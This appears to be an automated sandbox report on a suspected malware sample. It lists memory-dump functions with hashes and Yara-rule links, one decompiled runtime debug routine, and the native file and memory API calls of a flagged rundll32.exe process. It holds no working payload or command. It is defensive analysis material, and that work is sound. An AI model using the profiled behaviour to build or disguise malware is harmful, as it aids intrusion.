                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.261540179.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ef234063dc19f210a70bae7428b66babca74d45755b0a2ab5029f4164c4f962c
                                                                            • Instruction ID: ea4102b01792301a5e92dc3d108d4c7b813b652b012769d5aa7e9908f8e3d3c0
                                                                            • Opcode Fuzzy Hash: ef234063dc19f210a70bae7428b66babca74d45755b0a2ab5029f4164c4f962c
                                                                            • Instruction Fuzzy Hash: E69002A1601140434680B16948044465419E7E2341791C131A0444560DD6A89855E2A5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00AA99D0, Relevance: .0, Instructions: 4COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.261540179.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a86d4458615c32696607ee7822342cbe61ce772ec181f27ea8fd5bfc0a6f2b36
                                                                            • Instruction ID: d642fb31bcf3141b8e6508ba1b20ec6347d49ddaa7ff503e7b7ee80854962304
                                                                            • Opcode Fuzzy Hash: a86d4458615c32696607ee7822342cbe61ce772ec181f27ea8fd5bfc0a6f2b36
                                                                            • Instruction Fuzzy Hash: 249002A121100043D244616944047460449D7E2341F51C032A2144554DD5699C61A165
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00AA9950, Relevance: .0, Instructions: 4COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.261540179.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4f30ca6b83e0060b12c5ee421a4b3ea684fab9d9299c4989f7dbef5228d93b61
                                                                            • Instruction ID: e9433365228d043fac525cc9de086db07c8b76303feca9347528c0b528c59f52
                                                                            • Opcode Fuzzy Hash: 4f30ca6b83e0060b12c5ee421a4b3ea684fab9d9299c4989f7dbef5228d93b61
                                                                            • Instruction Fuzzy Hash: 939002A120140403D280656948046470409D7D1342F51C031A2054555FDA699C51B175
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00AA9A80, Relevance: .0, Instructions: 4COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.261540179.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2b931fe39de15e83f2d5088335ae1216ff6f51a85aa9d4699440d2b402625700
                                                                            • Instruction ID: 936949fc0e195b3af87fcc8b50261bb1b15fd386ce1bef0e7766b1d19d1683af
                                                                            • Opcode Fuzzy Hash: 2b931fe39de15e83f2d5088335ae1216ff6f51a85aa9d4699440d2b402625700
                                                                            • Instruction Fuzzy Hash: A990026120144443D28062694804B4F4509D7E2342F91C039A4146554DD9559855A761
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00AA9A10, Relevance: .0, Instructions: 4COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.261540179.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3cec0d34fa8c5ad8fd99880f9166ab7235441e3732bd9e4974a18dde3bf06b73
                                                                            • Instruction ID: 7fed28f27017d91fe909a0e699115d7c32b0c8d7970a2ed767ae396e20846922
                                                                            • Opcode Fuzzy Hash: 3cec0d34fa8c5ad8fd99880f9166ab7235441e3732bd9e4974a18dde3bf06b73
                                                                            • Instruction Fuzzy Hash: 5390027120140403D240616948087870409D7D1342F51C031A5154555FD6A5D891B571
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00AAA3B0, Relevance: .0, Instructions: 4COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.261540179.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 944075773fbd0cb4e681be7bdb4c34e59ee2af17bbd1dad6dd3db8d8b5ddd3b6
                                                                            • Instruction ID: b5d0f9ce3fb4aada2f14b424a84e755e03a42f629bab66f3d7a7c4552aa4476f
                                                                            • Opcode Fuzzy Hash: 944075773fbd0cb4e681be7bdb4c34e59ee2af17bbd1dad6dd3db8d8b5ddd3b6
                                                                            • Instruction Fuzzy Hash: 6190027120144003D2807169844464B5409E7E1341F51C431E0415554DD6559856E261
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00AA9B00, Relevance: .0, Instructions: 4COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.261540179.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a27cc5cc4dd8afb5a6faafa49f8ca1fe9297ee6eca6566a6397bc546049132c5
                                                                            • Instruction ID: 776c23441be3428e992387b3eba48c1286d5062ad414485a7b5721b9e89eb18f
                                                                            • Opcode Fuzzy Hash: a27cc5cc4dd8afb5a6faafa49f8ca1fe9297ee6eca6566a6397bc546049132c5
                                                                            • Instruction Fuzzy Hash: 2490026124100803D28071698414747040AD7D1741F51C031A0014554ED6569965B6F1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00AA95F0, Relevance: .0, Instructions: 4COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.261540179.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a1ba93e07d84be9c638fffe892155426d116ca7422aa2dd84ec44db0186891d4
                                                                            • Instruction ID: 9d74921b52bca0e5f4827e61ae14116197f4e33ba98693b6aaf6dfc56a16dac2
                                                                            • Opcode Fuzzy Hash: a1ba93e07d84be9c638fffe892155426d116ca7422aa2dd84ec44db0186891d4
                                                                            • Instruction Fuzzy Hash: 3390027120100803D244616948046C60409D7D1341F51C031A6014655FE6A59891B171
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00AA9520, Relevance: .0, Instructions: 4COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.261540179.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d3262ed5090320239eb0d62a0cef7ea9590f51a9383df634a5be37d2ac37b069
                                                                            • Instruction ID: 7d9662ad6e8a3fed1e88dd751ce4400a17061ec5250e468d676ad3c083087444
                                                                            • Opcode Fuzzy Hash: d3262ed5090320239eb0d62a0cef7ea9590f51a9383df634a5be37d2ac37b069
                                                                            • Instruction Fuzzy Hash: 889002E1201140934640A2698404B4A4909D7E1341F51C036E1044560DD5659851E175
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00AAAD30, Relevance: .0, Instructions: 4COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.261540179.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 62fb9d8e3972fe3c2372059165309c6db8f1890b28b3c6dd8f8ad052b60e8a8c
                                                                            • Instruction ID: 34e9d23b28d07dda06aa8d4f62a22997667d2d4d74561f2e18c7cb25afe26bca
                                                                            • Opcode Fuzzy Hash: 62fb9d8e3972fe3c2372059165309c6db8f1890b28b3c6dd8f8ad052b60e8a8c
                                                                            • Instruction Fuzzy Hash: CE900271A0500013928071694814686440AE7E1781F55C031A0504554DD9949A55A3E1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00AA9560, Relevance: .0, Instructions: 4COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.261540179.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 807c7c3c4ea71f69cbc52fcb2c5ebad7b85942768e21f6a59e9ef5d9edbf1ac9
                                                                            • Instruction ID: 3e5ee99703103bf0c494ce5b740914bb704dc17833dd4cc4dfcae72819f0a1b8
                                                                            • Opcode Fuzzy Hash: 807c7c3c4ea71f69cbc52fcb2c5ebad7b85942768e21f6a59e9ef5d9edbf1ac9
                                                                            • Instruction Fuzzy Hash: BD900265221000030285A569060454B0849E7D7391791C035F1406590DD6619865A361
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00AA96D0, Relevance: .0, Instructions: 4COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.261540179.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c717cff61ccb43fedfba088290d1647c2aa7196fd359bf905ec1a0e33c3671dc
                                                                            • Instruction ID: 53d2bf8f1b0d460efcd76ed25c909f7e08799cc461d3d10a605fa2e80575f851
                                                                            • Opcode Fuzzy Hash: c717cff61ccb43fedfba088290d1647c2aa7196fd359bf905ec1a0e33c3671dc
                                                                            • Instruction Fuzzy Hash: 4490027120100843D24061694404B860409D7E1341F51C036A0114654ED655D851B561
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00AA9610, Relevance: .0, Instructions: 4COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.261540179.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c67040dbf8fec358a8ad22804a1dc878ed713e8c2d69e346b7b3533f76365146
                                                                            • Instruction ID: a9ede3f7c53e25d79cfd4b8e9e7ab47ef1a10a3254a9be50b3da8e2cb2080f6c
                                                                            • Opcode Fuzzy Hash: c67040dbf8fec358a8ad22804a1dc878ed713e8c2d69e346b7b3533f76365146
                                                                            • Instruction Fuzzy Hash: 5E90027160500803D290716944147860409D7D1341F51C031A0014654ED7959A55B6E1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00AA9650, Relevance: .0, Instructions: 4COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.261540179.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 58cd91f686df796bfb5bc47276fa1236813a9e44e8c53aa90c04331b943d09af
                                                                            • Instruction ID: c084f8f012757f0d8577e2c57e4afae6fd6f9ea66af732f8ed40cab02e9168f7
                                                                            • Opcode Fuzzy Hash: 58cd91f686df796bfb5bc47276fa1236813a9e44e8c53aa90c04331b943d09af
                                                                            • Instruction Fuzzy Hash: 4790027120504843D28071694404A860419D7D1345F51C031A0054694EE6659D55F6A1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00AA9730, Relevance: .0, Instructions: 4COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.261540179.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1aa518a431db8f3fbf8dab5a7c5c6332b0a3fe47b082b5ba08aea8963dc7d359
                                                                            • Instruction ID: 02f0165ac3a81477885a747cb44e45e695ecb3afb0d27b0a62c6ce26b9f2ab04
                                                                            • Opcode Fuzzy Hash: 1aa518a431db8f3fbf8dab5a7c5c6332b0a3fe47b082b5ba08aea8963dc7d359
                                                                            • Instruction Fuzzy Hash: EF90026160500403D280716954187460419D7D1341F51D031A0014554ED6999A55B6E1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00AAA710, Relevance: .0, Instructions: 4COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.261540179.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f11f42688422bbc866fa7ca59c1251a679a157c5348223cfc49f5d9060a121ec
                                                                            • Instruction ID: d28de0b2940ae967444aac691aa3b382a3b9abd4964a1e1fd030553d0fadbc3c
                                                                            • Opcode Fuzzy Hash: f11f42688422bbc866fa7ca59c1251a679a157c5348223cfc49f5d9060a121ec
                                                                            • Instruction Fuzzy Hash: 6C900271301000539640A6A95804A8A4509D7F1341F51D035A4004554DD5949861A161
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00AA9760, Relevance: .0, Instructions: 4COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.261540179.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 40f369818cbe01a39cc72b3055df0d2a12d602eba24952e00c01333135c411b9
                                                                            • Instruction ID: f0913206a4ae92bd550c2b46d54513cd428747659343a1f707c27b14d2a72613
                                                                            • Opcode Fuzzy Hash: 40f369818cbe01a39cc72b3055df0d2a12d602eba24952e00c01333135c411b9
                                                                            • Instruction Fuzzy Hash: 6690027120100403D240616955087470409D7D1341F51D431A0414558EE6969851B161
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00AA9770, Relevance: .0, Instructions: 4COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.261540179.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 84f9349dcbe8c14ce4b94011731971fee3ee08ee14720653a0535a1deb889c51
                                                                            • Instruction ID: 89f98db0f3eb6d282948df418d73f6c62b2f969274da9508d1c86c7113ec9258
                                                                            • Opcode Fuzzy Hash: 84f9349dcbe8c14ce4b94011731971fee3ee08ee14720653a0535a1deb889c51
                                                                            • Instruction Fuzzy Hash: 5990026120504443D24065695408A460409D7D1345F51D031A1054595ED6759851F171
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00AAA770, Relevance: .0, Instructions: 4COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.261540179.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a3a467386f3f6d2c2db63433275328b97d1e958337217edd3546db674039fa6b
                                                                            • Instruction ID: 1407dcf5a6e870b0e1fffdcd91625bba82f79131df090ed1ac233d2e2e9f6331
                                                                            • Opcode Fuzzy Hash: a3a467386f3f6d2c2db63433275328b97d1e958337217edd3546db674039fa6b
                                                                            • Instruction Fuzzy Hash: CE90027520504443D64065695804AC70409D7D1345F51D431A041459CED6949861F161
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00AA9670, Relevance: .0, Instructions: 2COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.261540179.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                            • Instruction ID: 5af8322f4f95ad0ade0990ce6918233cddeed9e1a90a3dff63dd899b2780db26
                                                                            • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                            • Instruction Fuzzy Hash:
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00AFFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 53%
                                                                            			E00AFFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E00AACE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E00AF5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E00AF5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                            0x00affdda
                                                                            0x00affde2
                                                                            0x00affde5
                                                                            0x00affdec
                                                                            0x00affdfa
                                                                            0x00affdff
                                                                            0x00affe0a
                                                                            0x00affe0f
                                                                            0x00affe17
                                                                            0x00affe1e
                                                                            0x00affe19
                                                                            0x00affe19
                                                                            0x00affe19
                                                                            0x00affe20
                                                                            0x00affe21
                                                                            0x00affe22
                                                                            0x00affe25
                                                                            0x00affe40

                                                                            APIs
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AFFDFA
                                                                            Strings
                                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00AFFE01
                                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00AFFE2B
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.261540179.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                            Similarity
                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                            • API String ID: 885266447-3903918235
                                                                            • Opcode ID: 39207f8fa1284adc6ca361b59df95119587a5ec41a71054cdfdb9cfbdaa68416
                                                                            • Instruction ID: e48dd4179ea285de304f4e78694fd3cf748494568bc6589bbaec442085be3071
                                                                            • Opcode Fuzzy Hash: 39207f8fa1284adc6ca361b59df95119587a5ec41a71054cdfdb9cfbdaa68416
                                                                            • Instruction Fuzzy Hash: FEF0F632640605BFEA201A95DD02F33BF6AEB45730F240714F728565E2EA62F82097F0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Analysis Process: rundll32.exe PID: 4928 Parent PID: 3388 rundll32.exeCOMMON

                                                                            Executed Functions

                                                                            Function 006281B0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • NtCreateFile.NTDLL(00000060,00000000,.z`,00623B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00623B87,007A002E,00000000,00000060,00000000,00000000), ref: 006281FD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.479453831.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID: .z`
                                                                            • API String ID: 823142352-1441809116
                                                                            • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                            • Instruction ID: e1193bea8f9a0d17d4dd2b9b96b8d457b94080d9f8d5caba60cbada2e0fe88e6
                                                                            • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                            • Instruction Fuzzy Hash: 19F0B6B2201108AFCB48CF88DC85DEB77ADAF8C754F158248BA0D97241C630E8118BA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 006282DA, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36nativeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • NtClose.NTDLL( =b,?,?,00623D20,00000000,FFFFFFFF), ref: 00628305
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.479453831.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Close
                                                                            • String ID: =b
                                                                            • API String ID: 3535843008-240703288
                                                                            • Opcode ID: ef4dd95fd9b4f882ecc57c394c81a676cd5e551e016acccdd26bca5128f1c604
                                                                            • Instruction ID: c0333e5bf703e5c3ccf544fe51f44b6b72f2933325798d1782e7b7053630d13d
                                                                            • Opcode Fuzzy Hash: ef4dd95fd9b4f882ecc57c394c81a676cd5e551e016acccdd26bca5128f1c604
                                                                            • Instruction Fuzzy Hash: 40F05E76200114AFDB10EFD8EC80EEB77AAEF88750F108559FA089B241C630EA158BE0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 006281AA, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 33filenativeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • NtCreateFile.NTDLL(00000060,00000000,.z`,00623B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00623B87,007A002E,00000000,00000060,00000000,00000000), ref: 006281FD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.479453831.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID: .z`
                                                                            • API String ID: 823142352-1441809116
                                                                            • Opcode ID: d5ab14c4ad75129ae44f11daaefdbbf82298f557f787b086f0e786d0f5d8979b
                                                                            • Instruction ID: 97c4e3899938cb21dcaaa6c847ccee76d6c73ef237e2d2e7e57e3738c9f83d84
                                                                            • Opcode Fuzzy Hash: d5ab14c4ad75129ae44f11daaefdbbf82298f557f787b086f0e786d0f5d8979b
                                                                            • Instruction Fuzzy Hash: 99F09EB22144196F8B04DE8CED54DEB73AEEF8C3547058109F91DD3241D530E8218BA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 006282E0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • NtClose.NTDLL( =b,?,?,00623D20,00000000,FFFFFFFF), ref: 00628305
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.479453831.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Close
                                                                            • String ID: =b
                                                                            • API String ID: 3535843008-240703288
                                                                            • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                            • Instruction ID: 7c65f65209803780b98a7a202116c223e56bb5d691fb0ade5b8c1979460d91f1
                                                                            • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                            • Instruction Fuzzy Hash: 9DD012752002146BD710EF98DC45ED7775DEF44750F154459BA185B242C930F90086E0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00628260, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • NtReadFile.NTDLL(?,?,FFFFFFFF,00623A01,?,?,?,?,00623A01,FFFFFFFF,?,B=b,?,00000000), ref: 006282A5
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.479453831.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FileRead
                                                                            • String ID:
                                                                            • API String ID: 2738559852-0
                                                                            • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                            • Instruction ID: 79e1b8f9a04ee537230340f1bf147cd8a45b75d64811d5c7daa011a543f086d3
                                                                            • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                            • Instruction Fuzzy Hash: AAF0A4B2200208AFCB14DF89DC81EEB77ADAF8C754F158648BA1D97241DA30E8118BA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00628390, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00612D11,00002000,00003000,00000004), ref: 006283C9
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.479453831.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateMemoryVirtual
                                                                            • String ID:
                                                                            • API String ID: 2167126740-0
                                                                            • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                            • Instruction ID: bd718cce9c52fc591147c2dac349852f1353c90245ad79a339c4a3aae2ec3fe0
                                                                            • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                            • Instruction Fuzzy Hash: 0AF015B2200218AFCB14DF89DC81EEB77ADAF88750F118548BE0897241CA30F810CBE4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 04649540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.483200241.00000000045E0000.00000040.00000001.sdmp, Offset: 045E0000, based on PE: true
                                                                            • Associated: 00000007.00000002.483914780.00000000046FB000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.483945483.00000000046FF000.00000040.00000001.sdmp Download File
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: b2c6d41ab453cc0720d5291d6ed3c568b60b91770d18476f4c29d5baecffbec0
                                                                            • Instruction ID: f0157193fb2b2ea4e19b2f286e80e42bf51faee1cc5bce62449808db9d1df19d
                                                                            • Opcode Fuzzy Hash: b2c6d41ab453cc0720d5291d6ed3c568b60b91770d18476f4c29d5baecffbec0
                                                                            • Instruction Fuzzy Hash: 189002A5211001032106A9590705507005AD7D5395751C021F5006555CE661D8A16161
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 046495D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.483200241.00000000045E0000.00000040.00000001.sdmp, Offset: 045E0000, based on PE: true
                                                                            • Associated: 00000007.00000002.483914780.00000000046FB000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.483945483.00000000046FF000.00000040.00000001.sdmp Download File
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 663a480896ef4ccce9c4ab8c65a52b505ba4bdc71e18808259591233f9f0631b
                                                                            • Instruction ID: 7119080ef5f525b380da2fb0d0a5af74cea54ddf6b59e8f3ef6ac05087889e8f
                                                                            • Opcode Fuzzy Hash: 663a480896ef4ccce9c4ab8c65a52b505ba4bdc71e18808259591233f9f0631b
                                                                            • Instruction Fuzzy Hash: 299002E120200103610675594415616401ED7E0245F51C021E5005595DD565D8D17165
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 04649660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.483200241.00000000045E0000.00000040.00000001.sdmp, Offset: 045E0000, based on PE: true
                                                                            • Associated: 00000007.00000002.483914780.00000000046FB000.00000040.00000001.sdmp Download File
